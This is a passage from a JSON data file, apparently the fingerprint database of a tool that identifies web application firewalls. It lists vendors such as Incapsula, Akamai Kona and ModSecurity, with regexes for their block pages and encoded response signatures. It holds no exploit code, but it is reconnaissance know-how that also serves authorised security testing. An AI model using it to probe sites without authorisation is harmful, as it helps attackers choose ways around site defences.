\"6002:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUcMrmRWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"78df:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMrmRWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTD\",\n                \"cf65:RVZXum60OEhCWapBYKcPkoJzWOtohM4IiUcMrmRWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4VmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"85c6:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\",\n                \"9a2d:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMrmRWg1uQJLX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"0576:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMrmRXg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"f3bb:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUYMr2RXg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"471d:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"8936:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUcMrmRWg1uQJLX2uhdOnthsOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC\",\n                \"0ade:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\",\n                \"22d1:RVZXum60OEhCWapBYKcPkoJzWOpohM4IiUcMr2RWg1uQJbX2uhdOnthtOj+hXrAA16FcPxJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"e9bd:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthsOj+hXrAB16FcPxJPdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"comodo\": {\n            \"company\": \"Comodo\",\n            \"name\": \"Comodo\",\n            \"regex\": \"Server: Protected by COMODO WAF\",\n            \"signatures\": [\n                \"ade8:RVZXum60OEhCWapAYKYPkoJzWOpohc4IiUYMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTD\",\n                \"f063:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTD\",\n                \"985c:RVZXum60OEhCWapAYKYPkoJzWOpohc4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c3qA5chW1XaTD\",\n                \"f063:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTD\",\n                \"1971:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"crawlprotect\": {\n            \"company\": \"Jean-Denis Brun\",\n            \"name\": \"CrawlProtect\",\n            \"regex\": \"<title>CrawlProtect|This site is protected by CrawlProtectc|Set-Cookie: crawlprotecttag\",\n            \"signatures\": [\n                \"1eca:RVZXum60OEhCWKpBYKYPkoJzWOpohM4IiUYMrmRXg1uQJLX2uhZOnthtOj+hXrAA16FcPhJPdLoXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XKTC\"\n            ]\n        },\n        \"distil\": {\n            \"company\": \"Distil Networks\",\n            \"name\": \"Distil\",\n            \"regex\": \"distilCaptchaForm|distilCallbackGuard|cdn\\\\.distilnetworks\\\\.com/images/anomaly-detected\\\\.png\",\n            \"signatures\": []\n        },\n        \"dotdefender\": {\n            \"company\": \"Applicure Technologies\",\n            \"name\": \"dotDefender\",\n            \"regex\": \"dotDefender Blocked Your Request|Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID\",\n            \"signatures\": [\n                \"7cce:RVZXum60OEhCWapAYKYPkoJzWOpohM4IiUYMrmRWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"dddb:RVdXum61OElCWapAYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC\",\n                \"0718:RVZXum61OElCWapAYKYPk4JzWOtohM4IiUYMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\",\n                \"9bf2:RVdXum61OElCWapAYKYPk4JzWOtohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\"\n            ]\n        },\n        \"duedge\": {\n            \"company\": \"Baidu\",\n            \"name\": \"DuEdge\",\n            \"regex\": \"(?s)<h1>403<small>.+DuEdge Event ID: [0-9a-f]{16}.+IP: [0-9.]+\",\n            \"signatures\": []\n        },\n        \"expressionengine\": {\n            \"company\": \"EllisLab\",\n            \"name\": \"ExpressionEngine\",\n            \"regex\": \"(?s)\\\\bexp_last_.+?(Invalid GET Data|Invalid URI)\",\n            \"signatures\": [\n                \"88ec:RVZXum60OEhCWKpAYKYPkoJyWOpohM4JiUcMrmRWg1qQJbX3uhZOnthsOj6hX7AA16FcPxJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chS1XKTC\"\n            ]\n        },\n        \"fortiweb\": {\n            \"company\": \"Fortinet\",\n            \"name\": \"FortiWeb\",\n            \"regex\": \"Server Unavailable!\",\n            \"signatures\": [\n                \"9d05:RVZXu261OElCWapBYKcPk4JzWOtohM4IiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTD\"\n            ]\n        },\n        \"godaddy\": {\n            \"company\": \"GoDaddy\",\n            \"name\": \"GoDaddy Website Security\",\n            \"regex\": \"GoDaddy Security - Access Denied|Access Denied - GoDaddy Website Firewall\",\n            \"signatures\": [\n                \"6cff:RVdXum60OEhCWapAYKYPk4JzWOtohM4IiUYMr2RWg1uQJbX3uhdOn9htOj+hXrAA16FcPxJOdLoXomtKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"greywizard\": {\n            \"company\": \"Grey Wizard\",\n            \"name\": \"Greywizard\",\n            \"regex\": \"(?i)server: greywizard|detected attempted attack or non standard traffic from your IP address|<title>Grey Wizard</title>\",\n            \"signatures\": [\n                \"c669:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOnthsOj+hX7AB16FcPhJPdLsXomtKaK59nui7c4RmkwI2FZjxtDtAeq+c3qA5chW1XaTC\"\n            ]\n        },\n        \"gtmc\": {\n            \"company\": \"GTMC\",\n            \"name\": \"GTMC WAF\",\n            \"regex\": \"GTMC WAF1 Protection:|Please consult with administrator or waf@nm.gtmc.com.tw\",\n            \"signatures\": []\n        },\n        \"imunify360\": {\n            \"company\": \"CloudLinux\",\n            \"name\": \"Imunify360\",\n            \"regex\": \"Server: imunify360-webshield|protected by Imunify360|Powered by Imunify360|imunify360 preloader\",\n            \"signatures\": []\n        },\n        \"incapsula\": {\n            \"company\": \"Incapsula/Imperva\",\n            \"name\": \"Incapsula\",\n            \"regex\": \"Incapsula incident ID\",\n            \"signatures\": [\n                \"2770:RVZXum60OEhCWKpAYKYPkoJzWOpohc4IiUYMr2RWg1uQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"3193:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRXg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZnxtDtAeq6c3qA4chS1XKTC\",\n                \"cdd1:RVZXum60OEhCWapAYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtLaK99n+i7c4RmkgI2FZnxtTtBeq+c36A5chW1XaTC\"\n            ]\n        },\n        \"isaserver\": {\n            \"company\": \"Microsoft\",\n            \"name\": \"ISA Server\",\n            \"regex\": \"The (ISA Server|server) denied the specified Uniform Resource Locator \\\\(URL\\\\)\",\n            \"signatures\": []\n        },\n        \"ithemes\": {\n            \"company\": \"iThemes\",\n            \"name\": \"iThemes Security\",\n            \"regex\": \"\",\n            \"signatures\": [\n                \"c70f:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"71ee:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1qQJLX2uhZOnthtOj+hXrAA16FcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\"\n            ],\n            \"note\": \"Formerly Better WP Security\"\n        },\n        \"janusec\": {\n            \"company\": \"Janusec\",\n            \"name\": \"Janusec Application Gateway\",\n            \"regex\": \"Reason:.+by Janusec Application Gateway\",\n            \"signatures\": [\n                \"5c5d:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RWg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXo2tLaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTC\"\n            ]\n        },\n        \"jiasule\": {\n            \"company\": \"Jiasule\",\n            \"name\": \"Jiasule\",\n            \"regex\": \"Server: jiasule-WAF|notice-jiasule|static\\\\.jiasule\\\\.com/static/js/http_error\\\\.js\",\n            \"signatures\": [\n                \"7520:RVZXum61OElCWapAYKYPk4JzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtBeq+c36A5chW1XaTD\",\n                \"001e:RVZXum61OElCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI3FZjxtTtAeq+c36A5chW1XaTC\",\n                \"665d:RVZXum61OElCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA5chS1XaTC\",\n                \"4fed:RVZXum61OElCWapAYKYPkoJzWOpohM4IiUYMr2RXg1uQJbX2uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA5chW1XaTC\"\n            ]\n        },\n        \"knownsec\": {\n            \"company\": \"Knownsec\",\n            \"name\": \"KS-WAF\",\n            \"regex\": \"url\\\\('/ks-waf-error\\\\.png'\\\\)\",\n            \"signatures\": []\n        },\n        \"kona\": {\n            \"company\": \"Akamai Technologies\",\n            \"name\": \"Kona Site Defender\",\n            \"regex\": \"(?s)Server: AkamaiGHost.+?You don't have permission to access|\\\\b18\\\\.[0-9a-f]{8}.1[0-9]{9}\\\\.[0-9a-f]{7}\\\\b\",\n            \"signatures\": [\n                \"b996:RVZXum60OEhCWapAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"1893:RVZXum60OEhCWapAYKYPk4JzWOtohM4JiUcMr2RXg1uQJLX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkwI2FZjxtDtAeq+c3qA4chS1XKTC\",\n                \"165b:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"12b3:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"3426:RVZXum60OEhCWapAYKYPk4JzWOtohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"e197:RVZXum60OEhCWKpAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"eb57:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK59nui6c4RmkgI2FZjxtDtAeq6c36A4chS1XaTC\",\n                \"94ed:RVZXum60OEhCWapAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"5ca8:RVZXum60OEhCWKpAYKYPkoJzWOtohM4IiUYMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"cc5b:RVZXum60OEhCWKpAYKYPkoJzWOtohM4IiUYMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"e7d9:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"bd78:RVZXum60OEhCWKpAYKYPk4JzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"6cbc:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\",\n                \"a40d:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"1f03:RVZXum60OEhCWapBYKYPk4JzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\",\n                \"e120:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"7ae5:RVZXum60OEhCWKpAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"6bf2:RVZXum60OEhCWapAYKYPkoJzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"1db3:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"fcbb:RVZXum60OEhCWapAYKYPkoJzWOtohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"d1b6:RVZXum60OEhCWKpAYKYPkoJzWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"8b30:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTD\",\n                \"8db8:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"8900:RVZXum60OEhCWapAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"677e:RVZXum60OEhCWapAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"a13a:RVZXum60OEhCWKpAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"579e:RVZXum60OEhCWKpAYKYPkoJzWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"82b4:RVZXum60OEhCWapAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTD\",\n                \"22e4:RVZXum60OEhCWapAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq+c36A4chS1XaTC\",\n                \"bd0e:RVZXum60OEhCWapAYKYPk4JzWOtohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"8976:RVZXum60OEhCWKpAYKYPkoJzWOtohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC\",\n                \"e34c:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1qQJLX2uhdOn9htOj+hX7AB16FcPxJPdLsXomtKaK59nui6c4RmkgI2FZjxtDtAeq+c3qA4chS1XKTC\"\n            ]\n        },\n        \"kuipernet\": {\n            \"company\": \"ASTSoft\",\n            \"name\": \"Kuipernet\",\n            \"regex\": \"(?s)Content-Length: 118214.+W5M0MpCehiHzreSzNTczkc9d\",\n            \"signatures\": []\n        },\n        \"malcare\": {\n            \"company\": \"Inactiv\",\n            \"name\": \"MalCare\",\n            \"regex\": \"Blocked because of Malicious Activities|Firewall(<[^>]+>)*powered by(<[^>]+>)*MalCare\",\n            \"signatures\": [\n                \"def2:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC\"\n            ]\n        },\n        \"modsecurity\": {\n            \"company\": \"Trustwave\",\n            \"name\": \"ModSecurity\",\n            \"regex\": \"(?i)Server:.+mod_security|This error was generated by Mod_Security|/modsecurity\\\\-errorpage/|One or more things in your request were suspicious|rules of the mod_security module|mod_security rules triggered|Protected by Mod Security|HTTP Error 40\\\\d\\\\.0 - ModSecurity Action|40\\\\d ModSecurity Action|ModSecurity IIS \\\\(\\\\d+bits\\\\)</td>\",\n            \"signatures\": [\n                \"46d5:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"1ece:RVZXum61OEhCWapBYKcPk4JzWOpohc4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPhJPdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"69c6:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthsOj+hX7AB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"28eb:RVZXum60OEhCWapAYKYPkoJyWOpohM4IiUYMr2RWg1uQJLX2uhZOnthtOj+hXrAB16FcPhJOdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XaTC\",\n                \"3918:RVZXum60OEhCWapAYKYPk4JyWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK99n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"511d:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"f694:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhZOnthtOj+hX7AB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"51ca:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJOdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"e18b:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhZOnthtOj+hX7AB16FcPhJOdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"6e99:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"dd72:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"f53e:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"e15c:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhZOnthtOj+hX7AB16FcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"ded8:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhZOnthtOj+hXrAB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"6e99:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"7986:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPhJOdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"02b2:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"4602:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJOdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"b1a2:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"5e9a:RVZXum60OEhCWapAYKYPk4JyWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hXrAB16FcPhJPdLsXomtKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"35c4:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chS1XKTC\",\n                \"c697:RVZXum60OEhCWapAYKYPk4JyWOpohM4JiUcMr2RXg1uQJbX3uhZOnthtOj+hX7AB16FcPhJPdLsXomtKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"85e3:RVZXum60OElCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hX7AB16FcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"7d7f:RVZXum60OEhCWapAYKYPk4JyWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtKaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTD\",\n                \"064b:RVZXum60OEhCWapAYKYPk4JyWOpohM4JiUcMr2RXg1uQJbX3uhdOnthtOj+hXrAB16FcPhJOdLsXomtKaK99n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"5659:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUYMr2RXg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59n+i7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"94b1:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"7951:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUcMr2RXg1uQJLX2uhdOnthtOj+hXrAB16FcPhJPdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\",\n                \"b83a:RVZXum60OEhCWKpAYKYPkoJyWOpohM4JiUYMrmRWg1qQJbX2uhdOnthtOj+hX7AB16FcPhJPdLsXomtKaK59nui7c4RmkgI2FZjxtDtAeq6c3qA4chW1XaTD\",\n                \"4191:RVZXum60OEhCWapAYKYPkoJyWOpohM4JiUYMr2RXg1uQJbX2uhdOnthtOj+hX7AB16FcPhJPdLoXomtKaK59n+i7c4RmkgI2FZjxtDtAeq6c36A4chW1XaTD\"\n            ]\n        },\n        \"naxsi\": {\n            \"company\": \"NBS System\",\n            \"name\": \"NAXSI\",\n            \"regex\": \"(?i)Blocked By NAXSI|Naxsi Blocked Information|naxsi/waf\",\n            \"signatures\": [\n                \"19ee:RVdXum61OElCWKpAYKYPk4JzWOtohM4JiUcMr2RXg1uQJbX3uhdOn9htOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZnxtDtBeq+c36A4chW1XaTC\"\n            ]\n        },\n        \"netscaler\": {\n            \"company\": \"Citrix\",\n            \"name\": \"NetScaler AppFirewall\",\n            \"regex\": \"<title>Application Firewall Block Page</title>|Violation Category: APPFW_|AppFW Session ID|Access has been blocked - if you feel this is in error, please contact the site administrators quoting the following\",\n            \"signatures\": [\n                